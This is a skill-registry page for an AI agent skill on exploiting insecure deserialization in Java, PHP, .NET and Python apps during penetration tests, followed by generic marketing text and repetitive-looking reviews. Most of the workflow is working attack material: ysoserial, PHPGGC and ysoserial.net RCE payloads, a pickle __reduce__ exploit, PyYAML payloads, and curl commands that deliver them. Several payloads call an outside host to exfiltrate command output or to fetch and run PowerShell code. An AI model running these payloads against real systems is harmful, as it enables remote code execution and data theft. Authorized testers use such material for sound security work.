exploiting-insecure-deserialization▌
mukul975/Anthropic-Cybersecurity-Skills · updated May 25, 2026
MDX-style export adds YAML metadata + attribution linking explainx.ai and this canonical listing URL.
Identifying and exploiting insecure deserialization vulnerabilities in Java, PHP, Python, and .NET applications to achieve remote code execution during authorized penetration tests.
| name | exploiting-insecure-deserialization |
| description | Identifying and exploiting insecure deserialization vulnerabilities in Java, PHP, Python, and .NET applications to achieve remote code execution during authorized penetration tests. |
| domain | cybersecurity |
| subdomain | web-application-security |
| tags | - penetration-testing - deserialization - rce - owasp - web-security - ysoserial |
| version | '1.0' |
| author | mahipal |
| license | Apache-2.0 |
| nist_csf | - PR.PS-01 - ID.RA-01 - PR.DS-10 - DE.CM-01 |
Exploiting Insecure Deserialization
When to Use
- During authorized penetration tests when applications process serialized data (cookies, API parameters, message queues)
- When identifying Java serialization markers (
ac ed 00 05/rO0AB) in HTTP traffic - For testing PHP applications that use
unserialize()on user-controlled input - When evaluating .NET applications using
BinaryFormatter,ObjectStateFormatter, orViewState - During security assessments of applications using pickle (Python), Marshal (Ruby), or YAML deserialization
Prerequisites
- Authorization: Written penetration testing agreement with RCE testing scope
- ysoserial: Java deserialization exploit tool (
git clone https://github.com/frohoff/ysoserial.git) - ysoserial.net: .NET deserialization exploit tool (
git clone https://github.com/pwntester/ysoserial.net.git) - PHPGGC: PHP deserialization gadget chain generator (
git clone https://github.com/ambionics/phpggc.git) - Burp Suite Professional: With Java Deserialization Scanner extension
- Java Runtime: For running ysoserial
- Collaborator/interactsh: For out-of-band confirmation of code execution
Workflow
Step 1: Identify Serialized Data in Application Traffic
Detect serialized objects in HTTP parameters, cookies, and headers.
# Java serialization markers
# Binary: starts with 0xACED0005
# Base64: starts with rO0AB
# Gzip+Base64: starts with H4sIAAAAAAAA
# Search Burp proxy history for serialization signatures
# In Burp: Proxy > HTTP History > Search > "rO0AB"
# Check cookies and parameters for Base64-encoded serialized data
echo "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA..." | base64 -d | xxd | head
# PHP serialization format
# Looks like: O:4:"User":2:{s:4:"name";s:5:"admin";s:4:"role";s:4:"user";}
# a:2:{i:0;s:5:"hello";i:1;s:5:"world";}
# .NET ViewState
# __VIEWSTATE parameter in ASP.NET forms
# Starts with /wEP... (base64)
# Python pickle
# Base64 encoded pickle objects in cookies or API parameters
# Binary starts with 0x80 (protocol version)
# Common locations to check:
# - Session cookies
# - Hidden form fields (__VIEWSTATE, __EVENTVALIDATION)
# - API request/response bodies
# - WebSocket messages
# - Message queue payloads (JMS, RabbitMQ, Redis)
# - Cache entries (Memcached, Redis)
Step 2: Test Java Deserialization with ysoserial
Generate deserialization payloads for Java applications.
# List available gadget chains
java -jar ysoserial.jar 2>&1 | grep -E "^\s+\w"
# Generate DNS callback payload for detection (safest test)
java -jar ysoserial.jar URLDNS "http://java-deser.abc123.oast.fun" | base64 -w0
# Test with Burp Collaborator
# Replace serialized cookie/parameter with generated payload
# Check Collaborator for DNS/HTTP callbacks
# Generate RCE payloads with common gadget chains
# CommonsCollections (very common in Java apps)
java -jar ysoserial.jar CommonsCollections1 "curl http://abc123.oast.fun/rce" | base64 -w0
java -jar ysoserial.jar CommonsCollections5 "whoami" | base64 -w0
java -jar ysoserial.jar CommonsCollections6 "id" | base64 -w0
# Spring Framework gadget
java -jar ysoserial.jar Spring1 "curl http://abc123.oast.fun/spring" | base64 -w0
# Hibernate gadget
java -jar ysoserial.jar Hibernate1 "curl http://abc123.oast.fun/hibernate" | base64 -w0
# Send payload via curl
PAYLOAD=$(java -jar ysoserial.jar CommonsCollections5 "curl http://abc123.oast.fun/confirm" | base64 -w0)
curl -s -X POST \
-b "session=$PAYLOAD" \
"https://target.example.com/dashboard"
Step 3: Test PHP Deserialization with PHPGGC
Generate PHP gadget chains for common frameworks.
# List available PHP gadget chains
./phpggc -l
# Generate payloads for common PHP frameworks
# Laravel RCE
./phpggc Laravel/RCE1 system "id" -b
./phpggc Laravel/RCE5 system "whoami" -b
# Symfony RCE
./phpggc Symfony/RCE4 exec "curl http://abc123.oast.fun/php-rce" -b
# WordPress (via Guzzle)
./phpggc Guzzle/RCE1 system "id" -b
# Monolog RCE
./phpggc Monolog/RCE1 system "id" -b
# Test by injecting into cookie or parameter
PAYLOAD=$(./phpggc Laravel/RCE1 system "curl http://abc123.oast.fun/laravel" -b)
curl -s -b "serialized_data=$PAYLOAD" \
"https://target.example.com/dashboard"
# PHP object injection via manipulated serialized string
# Original: O:4:"User":2:{s:4:"name";s:5:"admin";s:4:"role";s:4:"user";}
# Modified: O:4:"User":2:{s:4:"name";s:5:"admin";s:4:"role";s:5:"admin";}
# Test for type juggling with PHP unserialize
# Change string to integer: s:4:"role" -> i:1
Step 4: Test .NET Deserialization
Assess ViewState and other .NET serialization vectors.
# Analyze .NET ViewState
# Check if ViewState MAC is enabled
# Unprotected ViewState starts with /wE and can be decoded
# Using ysoserial.net for .NET payloads
# (Run on Windows or via Mono on Linux)
./ysoserial.exe -g TypeConfuseDelegate -f ObjectStateFormatter \
-c "curl http://abc123.oast.fun/dotnet-rce" -o base64
./ysoserial.exe -g TextFormattingRunProperties -f BinaryFormatter \
-c "whoami" -o base64
# Test ViewState deserialization
# If __VIEWSTATEMAC is disabled or machine key is known:
./ysoserial.exe -g ActivitySurrogateSelector -f ObjectStateFormatter \
-c "powershell -c IEX(curl http://abc123.oast.fun/ps)" -o base64
# Insert payload into __VIEWSTATE parameter and submit form
# Check for .NET remoting endpoints
curl -s "https://target.example.com/remoting/service.rem"
# BinaryFormatter in API endpoints
# Look for Content-Type: application/octet-stream
# or application/x-msbin headers
Step 5: Test Python Pickle Deserialization
Exploit pickle-based deserialization in Python applications.
# Generate malicious pickle payload
import pickle
import base64
import os
class Exploit:
def __reduce__(self):
return (os.system, ('curl http://abc123.oast.fun/pickle-rce',))
payload = base64.b64encode(pickle.dumps(Exploit())).decode()
print(f"Pickle payload: {payload}")
# Alternative: Use pickletools for analysis
import pickletools
pickletools.dis(pickle.dumps(Exploit()))
# Send pickle payload
PAYLOAD=$(python3 -c "
import pickle, base64, os
class E:
def __reduce__(self):
return (os.system, ('curl http://abc123.oast.fun/pickle',))
print(base64.b64encode(pickle.dumps(E())).decode())
")
curl -s -X POST \
-H "Content-Type: application/octet-stream" \
-d "$PAYLOAD" \
"https://target.example.com/api/import"
# Check for YAML deserialization (PyYAML)
# Payload: !!python/object/apply:os.system ['curl http://abc123.oast.fun/yaml']
curl -s -X POST \
-H "Content-Type: application/x-yaml" \
-d "!!python/object/apply:os.system ['curl http://abc123.oast.fun/yaml']" \
"https://target.example.com/api/config"
Step 6: Confirm Exploitation and Document Impact
Validate successful deserialization attacks and document the impact chain.
# Confirm RCE with out-of-band callback
# Check interactsh/Collaborator for:
# 1. DNS resolution of your callback domain
# 2. HTTP request with command output
# 3. Timing-based confirmation (sleep commands)
# If blind, use timing-based confirmation
# Java: Thread.sleep(10000)
java -jar ysoserial.jar CommonsCollections5 "sleep 10" | base64 -w0
# Measure if response takes ~10 seconds longer
# Exfiltrate system info (authorized testing only)
java -jar ysoserial.jar CommonsCollections5 \
"curl http://abc123.oast.fun/\$(whoami)" | base64 -w0
# Document the gadget chain and affected library versions
# Check target classpath for vulnerable libraries:
# - commons-collections 3.x / 4.0
# - spring-core
# - hibernate-core
# - groovy
Key Concepts
| Concept | Description |
|---|---|
| Serialization | Converting an object into a byte stream for storage or transmission |
| Deserialization | Reconstructing an object from a byte stream, potentially executing code |
| Gadget Chain | A sequence of existing class methods chained together to achieve arbitrary code execution |
| Magic Methods | Special methods called automatically during deserialization (__wakeup, __destruct in PHP, readObject in Java) |
| ViewState | ASP.NET mechanism for persisting page state, often containing serialized objects |
| Pickle | Python's native serialization format, inherently unsafe for untrusted data |
| URLDNS Gadget | A Java gadget that triggers DNS lookup, useful for safe deserialization detection |
Tools & Systems
| Tool | Purpose |
|---|---|
| ysoserial | Java deserialization payload generator with multiple gadget chains |
| ysoserial.net | .NET deserialization payload generator |
| PHPGGC | PHP Generic Gadget Chains for multiple frameworks |
| Burp Java Deserialization Scanner | Automated detection of Java deserialization vulnerabilities |
| marshalsec | Java unmarshaller exploitation for various libraries |
| Freddy (Burp Extension) | Detects deserialization issues in multiple languages |
Common Scenarios
Scenario 1: Java Session Cookie RCE
A Java application stores session data as serialized objects in cookies. The rO0AB prefix reveals Java serialization. Using ysoserial with CommonsCollections gadget chain achieves remote code execution.
Scenario 2: PHP Laravel Unserialize
A Laravel application passes serialized data through a hidden form field. Using PHPGGC to generate a Laravel RCE gadget chain achieves command execution when the form is submitted.
Scenario 3: .NET ViewState Without MAC
An ASP.NET application has ViewState MAC validation disabled. Using ysoserial.net to generate a malicious ViewState payload achieves code execution when the page processes the modified ViewState.
Scenario 4: Python Pickle in Redis Cache
A Python web application stores pickled objects in Redis for caching. By poisoning the cache with a malicious pickle payload, code execution is triggered when the application deserializes the cached object.
Output Format
## Insecure Deserialization Finding
**Vulnerability**: Insecure Deserialization - Remote Code Execution
**Severity**: Critical (CVSS 9.8)
**Location**: Cookie `user_session` (Java serialized object)
**OWASP Category**: A08:2021 - Software and Data Integrity Failures
### Reproduction Steps
1. Capture the `user_session` cookie value (starts with rO0AB)
2. Generate payload: java -jar ysoserial.jar CommonsCollections5 "id"
3. Base64 encode and replace the cookie value
4. Send request; command executes on the server
### Vulnerable Library
- commons-collections 3.2.1 (CVE-2015-7501)
- Java Runtime: OpenJDK 11.0.15
### Confirmed Impact
- Remote Code Execution as `tomcat` user
- Server OS: Ubuntu 22.04 LTS
- Internal network access confirmed via reverse shell
- Database credentials accessible from application config
### Recommendation
1. Avoid deserializing untrusted data; use JSON or Protocol Buffers instead
2. Upgrade commons-collections to 4.1+ (patched version)
3. Implement deserialization filters (JEP 290 for Java 9+)
4. Use allowlists for permitted classes during deserialization
5. Implement integrity checks (HMAC) on serialized data before deserialization
How to use exploiting-insecure-deserialization on Cursor
AI-first code editor with Composer
Prerequisites
Before installing skills in Cursor, ensure your development environment meets these requirements:
- ›Cursor installed and configured on your development machine
- ›Node.js version 16.0+ with npm package manager (verify with
node --version) - ›Active project directory or workspace where you want to add exploiting-insecure-deserialization
Execute installation command
Execute the skills CLI command in your project's root directory to begin installation:
The skills CLI fetches exploiting-insecure-deserialization from GitHub repository mukul975/Anthropic-Cybersecurity-Skills and configures it for Cursor.
Select Cursor when prompted
The CLI will show a list of available agents. Use arrow keys to navigate and space to select Cursor:
Verify installation
Confirm successful installation by checking the skill directory location:
Reload or restart Cursor to activate exploiting-insecure-deserialization. Access the skill through slash commands (e.g., /exploiting-insecure-deserialization) or your agent's skill management interface.
Security & Verification Notice
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your development environment. Always verify the publisher's identity, review recent commits, and test in isolated environments before production deployment.
List & Monetize Your Skill
Submit your Claude Code skill and start earning
Use Cases▌
Task Automation & Efficiency
Automate repetitive workflows and reduce manual effort
Example
Generate reports, summarize documents, draft communications
Save 3-5 hours per week on routine tasks
Knowledge Enhancement
Learn new skills, understand complex topics, get expert guidance
Example
Explain concepts, provide examples, suggest learning resources
Accelerate learning and skill development by 2x
Quality Improvement
Enhance output quality through reviews, suggestions, and refinements
Example
Review drafts, suggest improvements, catch errors
Improve work quality by 30-40% with less effort
Implementation Guide▌
Prerequisites
- ›Claude Desktop or compatible AI client with skill support
- ›Clear understanding of task or problem to solve
- ›Willingness to iterate and refine outputs
Time Estimate
15-45 minutes depending on use case complexity
Installation Steps
- 1.Install skill using provided installation command
- 2.Test with simple use case relevant to your work
- 3.Evaluate output quality and relevance
- 4.Iterate on prompts to improve results
- 5.Integrate into regular workflow if valuable
Common Pitfalls
- ⚠Expecting perfect results without iteration
- ⚠Not providing enough context in prompts
- ⚠Using skill for tasks outside its intended scope
- ⚠Accepting outputs without review and validation
Best Practices▌
✓ Do
- +Start with clear, specific prompts
- +Provide relevant context and constraints
- +Review and refine all outputs before using
- +Iterate to improve output quality
- +Document successful prompt patterns
✗ Don't
- −Don't use without understanding skill limitations
- −Don't skip validation of outputs
- −Don't share sensitive information in prompts
- −Don't expect skill to replace human judgment
💡 Pro Tips
- ★Be specific about desired format and style
- ★Ask for multiple options to choose from
- ★Request explanations to understand reasoning
- ★Combine AI efficiency with human expertise
When to Use This▌
✓ Use When
Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.
✗ Avoid When
Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.
Learning Path▌
- 1Familiarize yourself with skill capabilities and limitations
- 2Start with low-risk, non-critical tasks
- 3Progress to more complex and valuable use cases
- 4Build expertise through regular use and experimentation
Discussion
Product Hunt–style comments (not star reviews)- No comments yet — start the thread.
Ratings
4.7★★★★★68 reviews- ★★★★★Chinedu Singh· Dec 28, 2024
exploiting-insecure-deserialization fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.
- ★★★★★Hana Flores· Dec 24, 2024
Useful defaults in exploiting-insecure-deserialization — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.
- ★★★★★Dhruvi Jain· Dec 16, 2024
exploiting-insecure-deserialization fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.
- ★★★★★Jin Lopez· Dec 16, 2024
Registry listing for exploiting-insecure-deserialization matched our evaluation — installs cleanly and behaves as described in the markdown.
- ★★★★★Hana Torres· Dec 12, 2024
exploiting-insecure-deserialization reduced setup friction for our internal harness; good balance of opinion and flexibility.
- ★★★★★Jin Khan· Dec 8, 2024
I recommend exploiting-insecure-deserialization for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.
- ★★★★★Omar Thompson· Nov 27, 2024
Keeps context tight: exploiting-insecure-deserialization is the kind of skill you can hand to a new teammate without a long onboarding doc.
- ★★★★★Hana Lopez· Nov 19, 2024
Registry listing for exploiting-insecure-deserialization matched our evaluation — installs cleanly and behaves as described in the markdown.
- ★★★★★Valentina Chen· Nov 15, 2024
exploiting-insecure-deserialization is among the better-maintained entries we tried; worth keeping pinned for repeat workflows.
- ★★★★★Oshnikdeep· Nov 7, 2024
Registry listing for exploiting-insecure-deserialization matched our evaluation — installs cleanly and behaves as described in the markdown.
showing 1-10 of 68